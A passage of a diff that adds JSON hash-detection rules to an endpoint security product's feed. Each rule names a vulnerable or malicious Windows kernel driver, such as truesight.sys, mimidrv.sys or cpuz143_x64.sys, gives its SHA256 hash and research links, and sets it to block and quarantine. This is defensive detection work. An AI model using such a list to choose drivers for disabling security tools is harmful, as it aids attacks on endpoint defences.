"2026-03-23T11:45:29.604832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "078998502b2dd463b8acd5488ee18645c876bb50ebd87e1b0f9ff845a29a2098", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bea296e6-3bd8-5f55-9def-6620c0baf99e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611376Z", + "creation_date": "2026-03-23T11:45:29.611378Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611383Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47c9323ae818bd2a3b55fc04abd984bd940cd4e27b6d4af311edcb66988ce941", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "beabe1d1-2fb2-5fab-bc50-ff1926806942", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979151Z", + "creation_date": "2026-03-23T11:45:29.979153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a", + "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "beb2b947-cb6c-5c16-bd9c-ef99ef6f1c56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820720Z", + "creation_date": "2026-03-23T11:45:30.820722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820727Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9a73df5ac5c68ef5b37a67e5e649332da0f649c3bb6828f70b65c0a2e7d3a23", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bec14d6b-515d-55ae-a358-dffb3e4754a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620710Z", + "creation_date": "2026-03-23T11:45:29.620712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620717Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bec7c8fc-986e-5da0-8288-1fe4d0d1af2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160118Z", + "creation_date": "2026-03-23T11:45:31.160120Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd35afd8d1b89bf4c00b5e9131f1abc82dc0492ec466b2c4b6bc6a633355b38a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bedc08e1-9d55-53ec-96eb-f7c2ac10eab7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485006Z", + "creation_date": "2026-03-23T11:45:31.485010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23b1fd33139874b173a22dfa0b9f240ce0c562e5e0da753986b934ed9a49e82d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"bedf6623-4a2a-576e-a387-1ff4a0827455", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809758Z", + "creation_date": "2026-03-23T11:45:31.809761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809770Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "525e959c75100ce85a55dd0bc284f5ba49cee289f92c8d2c5184c31961bed7cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "beeeec48-42d7-581a-a30a-c372a49a9c52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814094Z", + "creation_date": "2026-03-23T11:45:31.814098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.814107Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4afa14df5befa201438f898beaecd73750744a0dbdc065544c9b33edd5b79ded", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "befcfb04-7567-5250-809a-ec8a6ddba923", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824032Z", + "creation_date": "2026-03-23T11:45:31.824035Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea577fad09163c9eb5dcfbfe629a06990453244e9c0abb582c223a6c2a1961ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf08c60b-ae4d-574a-a101-317199e9ce0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486322Z", + "creation_date": "2026-03-23T11:45:31.486325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c3790006220e0e530320e78f0cad5127f3c90e02db53efd0ff07b5faa55fabd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf1274ca-4790-5d42-931a-b220d17af2a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470400Z", + "creation_date": "2026-03-23T11:45:30.470404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1425075f7a3f009f703ca8d5bbbfe2cfbc1a7de7f5e17d50708ba99dc0f668ff", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf17718e-d443-584b-9715-a4ec1b72d81d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143598Z", + "creation_date": "2026-03-23T11:45:31.143600Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143605Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60c2dd1c26116e207db74d90fb6952797dd8e1f3dc54a0a9a34241be556778ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf362bdd-e443-50fb-947a-c39425923c58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472920Z", + "creation_date": "2026-03-23T11:45:31.472923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed00b27f65e9161f83cbed6ba033f4efb0af9160ea380b1a46c0421898089501", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf3b495b-5e32-5e06-8eca-0ec57efa5602", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482794Z", + "creation_date": "2026-03-23T11:45:31.482798Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e41cfb31e0fdd74f88c237d41672f8667af5179bde7cde0f32cb24101985de81", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf4b144d-8d34-553e-b7e4-072372b5f86f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500522Z", + "creation_date": "2026-03-23T11:45:31.500525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3504feac7e57bd16959ff16abb9afbd7c9f6ceefcc3da8d0ae978219cabcf71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf4d934d-6d28-5df4-86a1-d980771005ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.495364Z", + "creation_date": "2026-03-23T11:45:31.495367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10dd3a2c8745d92c95b8180775a87d7c17ddf6a88f14c59a41aa5fc78fdfe1a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf4edc0b-cf2e-5b3b-a825-54197d6976f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816042Z", + "creation_date": "2026-03-23T11:45:30.816044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9452b5577681c74d568825c4e95c5c9a5e0f682782c8dd932a7d4d732e958802", + "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf519582-f806-5ab3-b423-2e380ae63b48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144192Z", + "creation_date": "2026-03-23T11:45:32.144196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08c4b75a9b715647a60b946f3743c4e49a6f5c36c1bc889e741d658508dc50c0", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf556c4b-97d1-5f9b-a108-05e30c521d9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145447Z", + "creation_date": "2026-03-23T11:45:31.145449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.145455Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f4f2f346a3e8035163a4fea0a6c2df2cbe0ea19399b2269fa9d4eacfdd4083c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf5e4f01-2fe8-595b-bf7d-cda3125f35eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821690Z", + "creation_date": "2026-03-23T11:45:31.821692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821698Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3cc8bbb5efb676b0aa2aea74d585bf1f7e245f81cbba8c79600373bfa37f509e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf652d58-5aa1-5652-b643-baf3f25f4735", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985593Z", + "creation_date": "2026-03-23T11:45:29.985595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985601Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea3c5569405ed02ec24298534a983bcb5de113c18bc3fd01a4dd0b5839cd17b9", + "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://ioctl.fail/echo-ac-writeup/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bf75b9ea-20b8-5f8e-a57e-66f3d9ca38c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143653Z", + "creation_date": "2026-03-23T11:45:31.143657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b1aa30ae6070876f539cb14013730d3d2d9ca3c805474d638d5b8c97bb101d44", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfa30aac-8827-5dfe-a5c5-7dec3c184f50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620278Z", + "creation_date": "2026-03-23T11:45:29.620280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620285Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfad995b-2bca-5c3c-988b-f8d4b32dfa82", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815933Z", + "creation_date": "2026-03-23T11:45:31.815935Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815941Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24add6fcd09dda0b3ef57d8fa53d5d45b63aecd3e4b2d754259aa70a288e997f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfbae45d-5a13-576a-a925-4b5eecdf87fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 